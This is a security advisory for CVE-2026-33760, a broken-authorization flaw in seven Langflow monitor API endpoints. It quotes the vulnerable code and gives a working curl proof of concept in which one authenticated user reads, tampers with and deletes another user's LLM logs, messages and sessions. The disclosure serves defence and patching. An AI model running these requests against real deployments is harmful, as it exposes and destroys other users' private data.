PT-2026-50139 · Pypi · Langflow

Published

2026-06-16

·

Updated

2026-06-16

·

CVE-2026-33760

CVSS v3.1

8.8

High

VectorAV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Summary

Langflow's /api/v1/monitor router exposes 7 endpoints that perform read, write, and delete operations on user-owned resources — messages, sessions, build artifacts, and LLM transaction logs — without verifying that the authenticated requester owns the targeted resource. Any authenticated user can read, modify, rename, or permanently delete another user's data by supplying the target's resource ID or flow id. This is a classic IDOR/BOLA vulnerability. Notably, the same source file (monitor.py) contains one correctly-implemented endpoint that uses an ownership check, demonstrating the correct pattern was known but inconsistently applied.

Details

Source file: src/backend/base/langflow/api/v1/monitor.py
The correct pattern (used only in GET /monitor/messages, lines 77–80):
python
stmt = select(MessageTable)
stmt = stmt.join(Flow, MessageTable.flow id == Flow.id)
stmt = stmt.where(Flow.user id == current user.id) # ownership enforced
All 7 vulnerable endpoints are missing this guard:
1. GET /api/v1/monitor/builds (lines 27–33) — reads build data for any flow id:
python
@router.get("/builds", dependencies=[Depends(get current active user)])
async def get vertex builds(flow id: Annotated[UUID, Query()], session: DbSession):
  vertex builds = await get vertex builds by flow id(session, flow id) # no ownership check
  return VertexBuildMapModel.from list of dicts(vertex builds)
2. DELETE /api/v1/monitor/messages (lines 102–107) — deletes any message by UUID:
python
@router.delete("/messages", status code=204, dependencies=[Depends(get current active user)])
async def delete messages(message ids: list[UUID], session: DbSession):
  await session.exec(delete(MessageTable).where(MessageTable.id.in (message ids)))
  # message ids accepted verbatim, no ownership check
3. PUT /api/v1/monitor/messages/{message id} (lines 110–134) — overwrites any message:
python
db message = await session.get(MessageTable, message id)
# no check: db message.flow id → Flow.user id == current user.id
db message.sqlmodel update(message dict)
4. PATCH /api/v1/monitor/messages/session/{old session id} (lines 137–171) — renames any session:
python
stmt = select(MessageTable).where(MessageTable.session id == old session id)
# no JOIN to Flow, no WHERE Flow.user id == current user.id
5. DELETE /api/v1/monitor/messages/session/{session id} (lines 174–188) — bulk-deletes any session:
python
await session.exec(
  delete(MessageTable).where(col(MessageTable.session id) == session id)
  # no ownership filter
)
6. GET /api/v1/monitor/transactions (lines 191–211) — reads LLM prompt/response logs for any flow id:
python
stmt = select(TransactionTable).where(TransactionTable.flow id == flow id)
# no JOIN to Flow, no WHERE Flow.user id == current user.id
7. DELETE /api/v1/monitor/builds — deletes build records for any flow id: Shares the same root cause as endpoint #1 (GET /builds): flow id is accepted as a bare query parameter and passed to the deletion path without a WHERE Flow.user id == current user.id ownership check, so any authenticated user can destroy another user's build artifacts.

PoC

Tested on Langflow v1.7.3 (langflowai/langflow:1.7.3) with two accounts: langflow (victim) and attacker test (attacker).
bash
# Setup: authenticate both users
TOKEN=$(curl -s -X POST http://localhost:7860/api/v1/login 
 -d "username=langflow&password=langflow" 
 | python3 -c "import sys,json; print(json.load(sys.stdin)['access token'])")

ATTKR=$(curl -s -X POST http://localhost:7860/api/v1/login 
 -d "username=attacker test&password=Attacker123" 
 | python3 -c "import sys,json; print(json.load(sys.stdin)['access token'])")

# Victim creates a flow (attacker only needs to know the flow id — obtainable via brute force or enumeration)
FLOW ID=$(curl -s -X POST http://localhost:7860/api/v1/flows/ 
 -H "Authorization: Bearer $TOKEN" -H "Content-Type: application/json" 
 -d '{"name":"victim-flow","data":{"nodes":[],"edges":[]}}' 
 | python3 -c "import sys,json; print(json.load(sys.stdin)['id'])")

# PoC 1: Read victim's LLM transaction logs (prompts + model responses)
curl -s "http://localhost:7860/api/v1/monitor/transactions?flow id=$FLOW ID" 
 -H "Authorization: Bearer $ATTKR"
# HTTP 200 — full transaction log returned including user prompts and model responses

# PoC 2: Read victim's build data
curl -s "http://localhost:7860/api/v1/monitor/builds?flow id=$FLOW ID" 
 -H "Authorization: Bearer $ATTKR"
# HTTP 200

# PoC 3: Delete victim's message (MESSAGE ID obtained from transaction log above)
curl -s -X DELETE "http://localhost:7860/api/v1/monitor/messages" 
 -H "Authorization: Bearer $ATTKR" -H "Content-Type: application/json" 
 -d '["<victim message id>"]'
# HTTP 204 — message deleted

# PoC 4: Tamper with victim's message content
curl -s -X PUT "http://localhost:7860/api/v1/monitor/messages/<victim message id>" 
 -H "Authorization: Bearer $ATTKR" -H "Content-Type: application/json" 
 -d '{"text":"TAMPERED BY ATTACKER"}'
# HTTP 200 — message overwritten, "edit":true set

# PoC 5: Rename victim's session
curl -s -X PATCH 
 "http://localhost:7860/api/v1/monitor/messages/session/victim-session-1?new session id=attacker-controlled" 
 -H "Authorization: Bearer $ATTKR"
# HTTP 200 — session renamed

# PoC 6: Bulk-delete victim's entire session
curl -s -X DELETE 
 "http://localhost:7860/api/v1/monitor/messages/session/victim-session-2" 
 -H "Authorization: Bearer $ATTKR"
# HTTP 204 — entire session deleted
All 6 demonstrated attack vectors confirmed (the 7th, DELETE /builds, shares the GET /builds root cause and was not separately scripted). After attacker operations: victim's message text read "TAMPERED BY ATTACKER", session renamed to attacker-controlled name, second session completely deleted.

Impact

This vulnerability affects any Langflow deployment with multiple users (team instances, SaaS deployments, enterprise self-hosted).
Confidentiality: GET /transactions exposes the full LLM conversation history — user-submitted prompts and model responses — for any flow by flow id. In healthcare, legal, financial, or HR deployments this directly exposes sensitive and potentially regulated data (HIPAA, GDPR). GET /builds exposes internal workflow execution state.
Integrity: PUT /messages/{id} allows rewriting any stored message, corrupting chat history, audit trails, and RAG-indexed memory. PATCH /messages/session/{id} allows renaming sessions, breaking session continuity and potentially injecting victim context into attacker-controlled namespaces.
Availability: DELETE /messages and DELETE /messages/session/{id} enable permanent, irreversible destruction of another user's conversation history and LLM logs. No recovery mechanism exists once data is deleted.
Any registered user account (including self-registered accounts if registration is open) has unrestricted cross-user access to all 6 operations against any other user's data.

Fix

IDOR

Found an issue in the description? Have something to add? Feel free to write us 👾
dbugs@ptsecurity.com

Weakness Enumeration

CWE-639

Related Identifiers

CVE-2026-33760
GHSA-9C59-2MVC-VFR8

Affected Products

Langflow